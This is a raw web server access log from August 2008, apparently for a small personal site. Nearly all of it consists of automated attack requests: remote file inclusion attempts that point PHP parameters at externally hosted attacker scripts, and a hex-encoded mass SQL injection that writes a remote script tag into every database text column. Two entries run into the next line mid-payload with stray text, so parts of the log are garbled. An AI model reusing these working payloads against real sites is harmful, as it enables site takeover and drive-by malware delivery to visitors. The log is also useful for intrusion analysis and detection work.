85.217.9.97 - - [19/Aug/2008:10:15:33 -0700] "GET /logs/access_080219.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432Bdecostedg@prodigy.net/us69.64.79.59 - - [19/Aug/2008:10:15:35 -0700] "GET /logs/middle.php?page=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:15:36 -0700] "GET /middle.php?page=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:15:36 -0700] "GET /logs/middle.php?page=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:15:36 -0700] "GET /middle.php?page=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:15:43 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:15:43 -0700] "GET //appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:15:43 -0700] "GET /logs//appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:15:49 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:15:49 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:15:49 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:10:15:49 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:15:56 -0700] "GET /logs/access_080330.log/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:15:57 -0700] "GET /index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 200 9928 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:15:57 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:16:09 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
217.151.80.21 - - [19/Aug/2008:10:16:12 -0700] "GET /logs/access_080601.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.80.21 - - [19/Aug/2008:10:16:13 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.80.21 - - [19/Aug/2008:10:16:13 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:16:22 -0700] "GET /logs/access_080322.log//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:16:32 -0700] "GET /logs/port.php?content=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:16:33 -0700] "GET /port.php?content=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
86.58.154.237 - - [19/Aug/2008:10:16:40 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:16:43 -0700] "GET /logs/access_080730.log//appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.164 - - [19/Aug/2008:10:16:47 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.142.223.164 - - [19/Aug/2008:10:16:47 -0700] "GET /logs//appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.142.223.164 - - [19/Aug/2008:10:16:47 -0700] "GET //appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.11 - - [19/Aug/2008:10:17:08 -0700] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:10:17:12 -0700] "GET /logs/access_070811.log HTTP/1.0" 200 94297 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.211.26 - - [19/Aug/2008:10:17:21 -0700] "GET /bikes/?S=A HTTP/1.1" 200 2735 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:10:17:22 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.253.176 - - [19/Aug/2008:10:17:29 -0700] "GET /errors.php?error=http://www.klubindia.com/adm/ide.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.142.223.164 - - [19/Aug/2008:10:17:30 -0700] "GET /logs/access_080730.log//appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:17:47 -0700] "GET /logs/index2.php?url_page=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:17:47 -0700] "GET /index2.php?url_page=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:17:48 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:10:17:59 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:18:08 -0700] "GET /logs/index1.php?dat=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:18:08 -0700] "GET /index1.php?dat=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.80.21 - - [19/Aug/2008:10:18:10 -0700] "GET /logs/access_080606.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:18:15 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:18:15 -0700] "GET ///vwar/backup/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:18:17 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.116.1.202 - - [19/Aug/2008:10:18:21 -0700] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://fan.simplified-evolution.net//tmp6/Za/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:10:18:22 -0700] "GET /logs//appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:10:18:22 -0700] "GET //appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.116.1.202 - - [19/Aug/2008:10:18:22 -0700] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://fan.simplified-evolution.net//tmp6/Za/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
200.150.189.10 - - [19/Aug/2008:10:18:22 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:10:18:39 -0700] "GET //?path%5Bdocroot%5D=http://x-foto.info/images/idd.txt?? HTTP/1.1" 200 9881 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.226.77.5 - - [19/Aug/2008:10:18:39 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://albforum.freehostia.com/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:10:18:42 -0700] "GET /logs/access_080218.log///vwar/backup/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:19:08 -0700] "GET /logs/index1.php?site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:19:08 -0700] "GET /index1.php?site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:10:19:33 -0700] "GET /logs/access_080530.log//modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.231 - - [19/Aug/2008:10:19:40 -0700] "GET /logs/access_080601.log//modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:19:42 -0700] "GET /logs/access_080215.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:19:43 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 200 10002 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:19:43 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:19:51 -0700] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:20:07 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:20:08 -0700] "GET /logs/access_080725.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.175.17.98 - - [19/Aug/2008:10:20:14 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:20:16 -0700] "GET /logs/index1.php?x=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:10:20:20 -0700] "GET /index1.php?x=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:20:33 -0700] "GET /logs/access_080115.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:20:37 -0700] "GET /logs/access_080209.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:20:45 -0700] "GET /logs/access_080222.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.201 - - [19/Aug/2008:10:20:54 -0700] "GET /blog/?show=gallery&pageid=169 HTTP/1.1" 200 9843 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
212.235.32.15 - - [19/Aug/2008:10:21:34 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.235.32.15 - - [19/Aug/2008:10:21:34 -0700] "GET /logs/access_080324.log//modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:21:35 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:21:35 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.235.32.15 - - [19/Aug/2008:10:21:35 -0700] "GET //modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:21:35 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:21:43 -0700] "GET /logs/access_080302.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:21:51 -0700] "GET /logs//include.php?path[docroot]=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:21:52 -0700] "GET //include.php?path[docroot]=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:21:55 -0700] "GET /logs/access_080113.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:22:25 -0700] "GET /logs/access_080324.log//modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:22:25 -0700] "GET //modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:22:25 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:22:26 -0700] "GET /logs//include.php?path[docroot]=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:10:22:26 -0700] "GET //include.php?path[docroot]=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.92.85.234 - - [19/Aug/2008:10:22:30 -0700] "GET /logs/access_080812.log//faqsupport/samplefaqsupport.php?path[docroot]=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:22:33 -0700] "GET /logs/access_080125.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.236.10.71 - - [19/Aug/2008:10:22:33 -0700] "GET /logs//components/errors.php?error=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [19/Aug/2008:10:22:34 -0700] "GET //components/errors.php?error=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [19/Aug/2008:10:22:36 -0700] "GET /logs/access_080516.log/index.php?open=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [19/Aug/2008:10:22:36 -0700] "GET /logs/index.php?open=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [19/Aug/2008:10:22:37 -0700] "GET /index.php?open=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 200 9869 "-" "libwww-perl/5.812" "www.dmulk.com"
82.174.42.138 - - [19/Aug/2008:10:22:47 -0700] "GET /logs/access_080728.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432wpottery2000/us1:165.24986.58.154.237 - - [19/Aug/2008:10:22:52 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:23:01 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:23:29 -0700] "GET /logs/access_080409.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:23:30 -0700] "GET /logs//include.php?path[docroot]=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:23:30 -0700] "GET //include.php?path[docroot]=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.149.62.160 - - [19/Aug/2008:10:23:31 -0700] "GET /logs/access_080126.log//modules/xfsection/modify.php?dir_module=http://xvascainox7.sites.uol.com.br/v6.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:23:36 -0700] "GET /logs/access_080121.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Aug/2008:10:23:42 -0700] "GET /logs/access_080415.log/errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Aug/2008:10:23:42 -0700] "GET /errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Aug/2008:10:23:43 -0700] "GET /logs/errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:23:51 -0700] "GET /logs/access_080330.log/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:23:52 -0700] "GET /index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 200 9928 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:23:52 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:23:56 -0700] "GET /logs/access_080330.log/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:23:57 -0700] "GET /index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 200 9928 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [19/Aug/2008:10:23:57 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:24:03 -0700] "GET /logs//include.php?path[docroot]=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:10:24:03 -0700] "GET //include.php?path[docroot]=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
